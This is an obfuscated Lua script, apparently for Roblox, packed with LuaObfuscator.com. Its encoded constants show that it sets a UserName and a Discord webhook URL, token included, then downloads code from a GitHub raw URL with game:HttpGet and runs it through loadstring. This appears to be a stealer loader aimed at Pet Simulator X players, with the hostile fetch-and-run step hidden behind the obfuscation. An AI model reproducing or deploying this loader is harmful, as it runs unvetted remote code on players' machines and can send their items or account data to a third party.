--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.2.5) ~  Much Love, Ferib 

]]--

do local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v20)if (v1(v20,2)==79) then v19=v0(v3(v20,1,1));return "";else local v69=v2(v0(v20,16));if v19 then local v77=v5(v69,v19);v19=nil;return v77;else return v69;end end end);local function v21(v22,v23,v24)if v24 then local v70=0;local v71;while true do if ((0 -0)==v70) then v71=(v22/(2^(v23-(1 + 0))))%((1520 -(1355 + 163))^(((v24-(1439 -(388 + 1050))) -(v23-(1138 -(1010 + 127)))) + (1 -0))) ;return v71-(v71%(1 + 0 + 0)) ;end end else local v72=0 + (74 -(43 + 31)) ;local v73;while true do if (v72==0) then v73=(5 -3)^(v23-(858 -(433 + 15 + 409))) ;return (((v22%(v73 + v73))>=v73) and (3 -2)) or (0 -0) ;end end end end local function v25()local v38=v1(v16,v18,v18);v18=v18 + 1 ;return v38;end local function v26()local v39=0;local v40;local v41;while true do if (v39==(0 + 0)) then v40,v41=v1(v16,v18,v18 + 2 );v18=v18 + (7 -(19 -14)) ;v39=2 -1 ;end if (v39==(1176 -((1608 -791) + 358))) then return (v41 * (597 -341)) + v40 ;end end end local function v27()local v42,v43,v44,v45=v1(v16,v18,v18 + (1420 -(205 + 1212)) );v18=v18 + (621 -(591 + 26)) ;return (v45 * (42812632 -26035416)) + (v44 * (66401 -(513 + (1083 -(173 + 558))))) + (v43 * (990 -734)) + v42 ;end local function v28()local v46=v27();local v47=v27();local v48=1346 -(745 + 600) ;local v49=(v21(v47,1,42 -22 ) * ((1591 -(689 + (2410 -(403 + 1107))))^(11 + (1025 -(693 + 311))))) + v46 ;local v50=v21(v47,6 + 15 ,24 + 7 );local v51=((v21(v47,98 -66 )==(4 -3)) and  -(2 -1)) or 1 ;if (v50==(0 -0)) then if (v49==(0 + 0)) then return v51 * (0 -0) ;else v50=4 -3 ;v48=0 + 0 ;end elseif (v50==((2187 + 792) -(478 + 454))) then return ((v49==(0 -0)) and (v51 * ((1 + 0)/(0 -0)))) or (v51 * NaN) ;end return v8(v51,v50-((345 + 1938) -1260) ) * (v48 + (v49/(2^(30 + 22)))) ;end local function v29(v30)local v52;if  not v30 then v30=v27();if (v30==(0 -0)) then return "";end end v52=v3(v16,v18,(v18 + v30) -(3 -2) );v18=v18 + v30 ;local v53={};for v67=988 -(71 + 916) , #v52 do v53[v67]=v2(v1(v3(v52,v67,v67)));end return v6(v53);end local v31=v27;local function v32(...)return {...},v12("#",...);end local function v33()local v54=0 + 0 ;local v55;local v56;local v57;local v58;local v59;local v60;local v61;local v62;while true do if (v54==(0 + 0)) then v55=0 + 0 ;v56=nil;v54=2 -1 ;end if (v54==(12 -9)) then v61=nil;v62=nil;v54=624 -(369 + 251) ;end if (2~=v54) then else v59=nil;v60=nil;v54=2 + 1 ;end if (v54==(1 + 0)) then v57=nil;v58=nil;v54=2;end if (v54==(5 -1)) then while true do if (v55==(7 -4)) then v62=nil;while true do if (v56==(0 -0)) then local v96=0 + 0 ;local v97;while true do if ((1704 -(808 + 896))==v96) then v97=0 + 0 ;while true do if (v97==(462 -(441 + 19))) then v56=1 + 0 ;break;end if (v97~=(0 + 0)) then else v57={};v58={};v97=1;end if (v97~=(197 -(106 + 90))) then else v59={};v60={v57,v58,nil,v59};v97=1522 -(487 + 1033) ;end end break;end end end if (v56==(2 + 0)) then local v98=0;while true do if (v98==0) then for v110=1304 -(242 + 1061) ,v27() do local v111=1238 -(1185 + 53) ;local v112;local v113;local v114;while true do if (v111~=(0 -0)) then else v112=0 -0 ;v113=nil;v111=3 -2 ;end if (v111==(16 -(12 + 3))) then v114=nil;while true do if (v112==0) then local v122=0;while true do if (v122==(363 -(105 + 257))) then v112=1;break;end if (v122==(0 + 0)) then v113=0 -0 ;v114=nil;v122=1 -0 ;end end end if (v112==(1477 -(1313 + 163))) then while true do if (v113==(0 -0)) then v114=v25();if (v21(v114,2 -1 ,1 -0 )~=(0 -0)) then else local v131=0 + 0 ;local v132;local v133;local v134;local v135;while true do if (v131~=2) then else while true do if (v132==0) then local v171=365 -(282 + 83) ;local v172;while true do if (v171==0) then v172=0;while true do if (v172==(0 -0)) then v133=v21(v114,2,104 -(33 + 68) );v134=v21(v114,3 + 1 ,22 -16 );v172=1 + 0 ;end if (v172==(3 -2)) then v132=1;break;end end break;end end end if (v132~=(3 -1)) then else local v173=679 -(378 + 301) ;while true do if ((1608 -(1598 + 10))==v173) then if (v21(v134,1 -0 ,3 -2 )~=(1708 -(68 + 1639))) then else v135[3 -1 ]=v62[v135[2]];end if (v21(v134,402 -(251 + 149) ,1912 -(1528 + 382) )~=(2 -1)) then else v135[9 -6 ]=v62[v135[9 -6 ]];end v173=1 -0 ;end if (v173==(1131 -(355 + 775))) then v132=4 -1 ;break;end end end if (v132==1) then local v174=0;while true do if ((3 -2)==v174) then v132=2 + 0 ;break;end if (v174==(0 + 0)) then local v182=0 + 0 ;while true do if (v182~=(1 + 0)) then else v174=1;break;end if (v182~=(1464 -(524 + 940))) then else v135={v26(),v26(),nil,nil};if (v133==(0 -0)) then local v195=962 -(512 + 450) ;local v196;while true do if (v195==(0 -0)) then v196=1037 -(370 + 667) ;while true do if (v196==(0 -0)) then v135[3]=v26();v135[396 -(180 + 212) ]=v26();break;end end break;end end elseif (v133==1) then v135[3 + 0 ]=v27();elseif (v133==2) then v135[3 + 0 ]=v27() -(2^(23 -7)) ;elseif (v133==3) then local v205=0;local v206;local v207;while true do if (v205~=(610 -(529 + 81))) then else v206=0;v207=nil;v205=642 -(220 + 421) ;end if (1~=v205) then else while true do if (v206==(0 -0)) then v207=0 -0 ;while true do if (v207==(0 -0)) then v135[3]=v27() -(2^16) ;v135[1068 -(630 + 434) ]=v26();break;end end break;end end break;end end end v182=2 -1 ;end end end end end if (v132~=(1159 -(995 + 161))) then else if (v21(v134,1 + 2 ,2 + 1 )~=(2 -1)) then else v135[4]=v62[v135[7 -3 ]];end v57[v110]=v135;break;end end break;end if (v131~=(1074 -(715 + 359))) then else local v160=1289 -(20 + 1269) ;while true do if (v160~=(1484 -(644 + 840))) then else v132=0 -0 ;v133=nil;v160=279 -(276 + 2) ;end if (v160==(4 -3)) then v131=1 + 0 ;break;end end end if ((1 + 0)==v131) then v134=nil;v135=nil;v131=1185 -(74 + 1109) ;end end end break;end end break;end end break;end end end for v115=1230 -(598 + 631) ,v27() do v58[v115-(1745 -(756 + 988)) ]=v33();end v98=1;end if (v98==1) then for v117=1,v27() do v59[v117]=v27();end return v60;end end end if ((166 -(153 + 12))~=v56) then else local v99=926 -(474 + 452) ;local v100;while true do if (v99~=0) then else v100=0 + 0 ;while true do if (v100==(2 -0)) then v56=2;break;end if (v100~=(215 -(142 + 72))) then else local v119=0 + 0 ;while true do if (v119~=(0 -0)) then else for v123=1,v61 do local v124=0;local v125;local v126;local v127;local v128;while true do if (v124==(0 + 0)) then v125=0 -0 ;v126=nil;v124=1 + 0 ;end if ((1 -0)==v124) then v127=nil;v128=nil;v124=5 -3 ;end if (v124==(1928 -(692 + 1234))) then while true do if ((4 -3)==v125) then v128=nil;while true do if (v126==(0 + 0)) then local v166=0;local v167;while true do if (v166~=(0 + 0)) then else v167=0;while true do if ((1 + 0)==v167) then v126=1 + 0 ;break;end if (v167~=0) then else local v187=0;while true do if (v187~=(63 -(25 + 37))) then else v167=3 -2 ;break;end if ((0 -0)~=v187) then else v127=v25();v128=nil;v187=1 + 0 ;end end end end break;end end end if (v126==1) then if (v127==(2 -1)) then v128=v25()~=(0 + 0) ;elseif (v127==(1 + 1)) then v128=v28();elseif (v127==(1 + 2)) then v128=v29();end v62[v123]=v128;break;end end break;end if (v125~=(0 -0)) then else local v141=0;while true do if (v141==1) then v125=1;break;end if (v141==(0 -0)) then v126=1728 -(1206 + 522) ;v127=nil;v141=1;end end end end break;end end end v60[3]=v25();v119=1 -0 ;end if (v119~=(330 -(97 + 232))) then else v100=1008 -(646 + 360) ;break;end end end if ((409 -(320 + 89))==v100) then v61=v27();v62={};v100=1 + 0 ;end end break;end end end end break;end if (v55==0) then v56=0 -0 ;v57=nil;v55=1;end if (v55==(2 -1)) then local v84=526 -(297 + 229) ;while true do if ((0 -0)~=v84) then else v58=nil;v59=nil;v84=1;end if (v84~=1) then else v55=2 + 0 ;break;end end end if (v55==(1029 -(78 + 949))) then local v85=0 + 0 ;while true do if (v85==(0 + 0)) then v60=nil;v61=nil;v85=1;end if ((1674 -(873 + 800))~=v85) then else v55=760 -(184 + 573) ;break;end end end end break;end end end local function v34(v35,v36,v37)local v63=0;local v64;local v65;local v66;while true do if (v63==1) then v66=v35[3];return function(...)local v78=0;local v79;local v80;local v81;local v82;local v83;while true do if (0==v78) then v79=1;v80= -1;v78=1;end if (v78==3) then A,B=v32(v11(v83));if  not A[1] then local v101=v35[4][v79] or "?" ;error("Script error at ["   .. v101   .. "]:"   .. A[2] );else return v13(A,2,B);end break;end if (1==v78) then v81={...};v82=v12("#",...) -1 ;v78=2;end if (2==v78) then v83=nil;v83=function()local v86=v64;local v87=v65;local v88=v66;local v89=v32;local v90={};local v91={};local v92={};for v102=0 + 0 ,v82 do if ((v102>=v88) or (2607<=1265)) then v90[v102-v88 ]=v81[v102 + 1 + 0 ];else v92[v102]=v81[v102 + 1 ];end end local v93=(v82-v88) + 1 + 0 ;local v94;local v95;while true do local v103=0 -0 ;local v104;local v105;while true do if (((3878 -(629 + 605))<=((106 -49) + 3559)) and (v103==(744 -(546 + 198)))) then v104=78 -(36 + 14 + (407 -(217 + 162))) ;v105=nil;v103=1 + 0 ;end if ((v103==((2 + 0) -1)) or ((3873 -(554 + 451))<=1675)) then while true do if ((v104==0) or ((7481 -3285)>(3023 + 1252))) then v105=1001 -(788 + 213) ;while true do if ((v105==0) or ((1861 -(725 + 336))>((12892 -3760) -5268))) then local v121=0 -0 ;while true do if (((49 + 50)==99) and (v121==0)) then v94=v86[v79];v95=v94[680 -((1359 -(109 + 888)) + 317) ];v121=1;end if (((3092 -(87 + 78 + 940))>(1457 -(1189 + 108))) and (v121==(3 -2))) then v105=1;break;end end end if ((v105==(26 -(21 + 4))) or ((1374 -(447 + 187))==3576)) then if (((1615 + 150)>=(1704 -1290)) and (v95<=(5 + 0))) then if (((11196 -(2182 + 5701))<(1802 + 1603)) and (v95<=(2 + 0))) then if ((v95<=(0 -(663 -(651 + 12)))) or ((1519 + 1812)<(1919 -(12 + 156)))) then if ((v94[2]==v92[v94[16 -(1492 -(559 + 921)) ]]) or (2062>=2496)) then v79=v79 + 1 + 0 ;else v79=v94[1010 -((3482 -2500) + 25) ];end elseif ((v95>(1998 -(45 + 21 + 1931))) or (4072<=(2284 -839))) then local v143=0 -0 ;local v144;local v145;local v146;while true do if (((1228 + 395)<=3292) and (v143==(2 -1))) then v146=nil;while true do if ((1==v144) or (4554<=(1 + 24 + 275))) then while true do if ((v145==(0 + (1165 -(683 + 482)))) or ((2152 + 157)>(17600 -13804))) then v146=v94[4 -2 ];v92[v146]=v92[v146](v13(v92,v146 + (1 -0) ,v80));break;end end break;end if (((5834 -4269)>(542 + (411 -201))) and (v144==(0 -0))) then local v178=0;while true do if (((3317 + 900)>=1252) and (v178==(1 + 0))) then v144=1;break;end if ((v178==0) or (1073>=(5903 -(1148 + 633)))) then v145=(0 + 0) -0 ;v146=nil;v178=(836 -408) -(286 + 141) ;end end end end break;end if ((v143==(0 -0)) or (4027<2701)) then v144=0;v145=nil;v143=1845 -(250 + 1594) ;end end else v92[v94[2]]=v37[v94[1199 -(36 + 1160) ]];end elseif (((4270 + 38)==(5553 -1245)) and (v95<=(3 + 0))) then v37[v94[1400 -(213 + 1184) ]]=v92[v94[1 + (1312 -(1262 + 49)) ]];elseif ((1433<(9331 -4625)) and (v95==(4 + 0))) then v79=v94[3 + 0 ];else v92[v94[(3 + 1) -2 ]]=v94[693 -(476 + 214) ]~=(0 -(765 -(253 + 512))) ;end elseif ((v95<=(236 -(209 + 19))) or ((2147 -1396)>(1603 + 1774))) then if ((v95<=(370 -(19 + 345))) or (1378>=2443)) then if (((15420 -10542)>(4391 -(341 + 19))) and (v92[v94[2]]==v94[1463 -(1225 + 234) ])) then v79=v79 + (880 -(215 + 473 + 191)) ;else v79=v94[8 -5 ];end elseif ((984<=(6165 -(577 + 1195))) and (v95>(6 + 1))) then do return;end else v92[v94[223 -(116 + 105) ]]();end elseif ((v95<=(835 -(397 + 429))) or ((2835 + 556)>=(18387 -14459))) then local v138=469 -(14 + 455) ;local v139;local v140;while true do if ((v138==(1 + 0)) or (((5328 -(68 + 130)) -(4435 -(1061 + 838)))>=(8542 -3953))) then v92[v139 + 1 ]=v140;v92[v139]=v140[v94[4 -(0 -0) ]];break;end if ((v138==(0 -0)) or (((2474 + 2135) -(816 + 697 + 59))==(15228 -10561))) then v139=v94[6 -4 ];v140=v92[v94[7 -4 ]];v138=1568 -(335 + 1232) ;end end elseif ((v95>(4 + 6)) or ((2339 + 1058)<=(215 + 2608))) then v92[v94[2 + 0 ]]=v94[5 -2 ];else local v154=798 -(133 + 665) ;local v155;local v156;local v157;local v158;local v159;while true do if (((3217 -1256)==1961) and (v154==(5 -(1 + 2)))) then v159=nil;while true do if (((10216 -6733)==(11100 -7617)) and (v155==2)) then for v183=v156,v80 do local v184=0 -(537 -(463 + 74)) ;local v185;local v186;while true do if ((1172==1172) and (v184==(0 + 0))) then v185=0 + 0 ;v186=nil;v184=3 -2 ;end if ((v184==(1 + 0)) or ((5619 -(575 + 160))<(2305 + 2111))) then while true do if ((v185==(0 + 0)) or (((4590 -(18 + 1341)) -(1234 + 66))<=(373 -(36 + 202)))) then v186=0 -(0 -0) ;while true do if ((v186==(0 + 0)) or ((3701 -(984 + (1710 -1137)))>=((17475 -11727) -3567))) then v159=v159 + 1 ;v92[v183]=v157[v159];break;end end break;end end break;end end end break;end if ((v155==(0 -0)) or ((3141 -(1848 + 118))<(655 -(303 + 85)))) then local v179=0 + 0 ;local v180;while true do if ((v179==(541 -(136 + 405))) or ((23 -14)>(43 + 130))) then v180=0;while true do if ((v180==(1 + 0)) or ((15062 -11155)>=(6849 -2837))) then v155=1;break;end if ((v180==(0 -(782 -(393 + 389)))) or ((680 + 3986)<=(736 + 2772))) then local v197=0 + 0 ;while true do if ((v197==(0 + 0)) or ((3697 -(1395 + 119 + 36))<(27 + 43))) then v156=v94[893 -(647 + 244) ];v157,v158=v89(v92[v156](v13(v92,v156 + 1 + 0 ,v94[1 + 2 ])));v197=1;end if ((2859>=707) and (v197==(1 + 0))) then v180=434 -(412 + 21) ;break;end end end end break;end end end if (((1 -0)==v155) or ((1770 -(232 + 1186))>(4894 -3197))) then local v181=0 + 0 ;while true do if (((2317 + 762)<=(4010 + 959)) and (v181==(1841 -(1071 + 769)))) then v155=2;break;end if (((330 + 83)<(4174 -(1349 + 552))) and (v181==0)) then local v194=0 + 0 ;while true do if (((6085 -(715 + 226 + 712))<=(3847 + 771)) and (v194==(1575 -(936 + 639)))) then v80=(v158 + v156) -1 ;v159=999 -(171 + 828) ;v194=2 -1 ;end if ((v194==(2 -1)) or (719>(2222 -(325 + 108)))) then v181=1113 -(487 + (1087 -(112 + 350))) ;break;end end end end end end break;end if (((4329 -(1227 + 568))>(999 -(287 + 43))) and (v154==(2 -1))) then local v169=0 -0 ;while true do if (((4153 -(279 + 140))==(56 + 3678)) and (v169==(1175 -(401 + 774)))) then v157=nil;v158=nil;v169=3 -2 ;end if (((518 + 579)>105) and (v169==(3 -2))) then v154=1426 -(303 + 332 + (1462 -(377 + 296))) ;break;end end end if (((24068 -19093)>=(2518 + 328 + 1040)) and (v154==0)) then local v170=201 -(7 + 194) ;while true do if ((v170==(1341 -(419 + 921))) or ((1406 -(1057 + 241))>(58 + 300))) then v154=(1033 -435) -(168 + 429) ;break;end if (((15601 -11661)>1193) and (((1811 -(998 + 813)) -0)==v170)) then v155=(372 -(248 + 124)) -0 ;v156=nil;v170=1483 -(1000 + 482) ;end end end end end v79=v79 + 1 ;break;end end break;end end break;end end end end;v78=3;end end end;end if (v63==0) then v64=v35[1];v65=v35[2];v63=1;end end end return v34(v33(),{},v17)(...);end v15("LOL!0A3O00028O0003083O00557365724E616D6503063O0076496D66616F03073O00576562682O6F6B03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F313038393833323436373236303738343635302F705775746E71416946415A34374E47686352767A54442O624B654B5949696A3943785A71724A2D6A4C305A5F2D65584A6578514A623231704D6779724C7A6950564A6955026O00F03F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403323O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F507378302F412F6D61696E2F6D61696E00153O00120B3O00013O0026063O000800010001002O043O0008000100120B000100033O001203000100023O00120B000100053O001203000100043O00120B3O00063O000E2O0006000100013O002O043O00010001001201000100073O001201000200083O00200900020002000900120B0004000A4O0005000500014O000A000200054O000200013O00022O0007000100010001002O043O00140001002O043O000100012O00083O00017O00153O00023O00043O00043O00053O00053O00063O00063O00073O00093O00093O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000A3O000B3O000C3O000E3O00",v9(),...);end
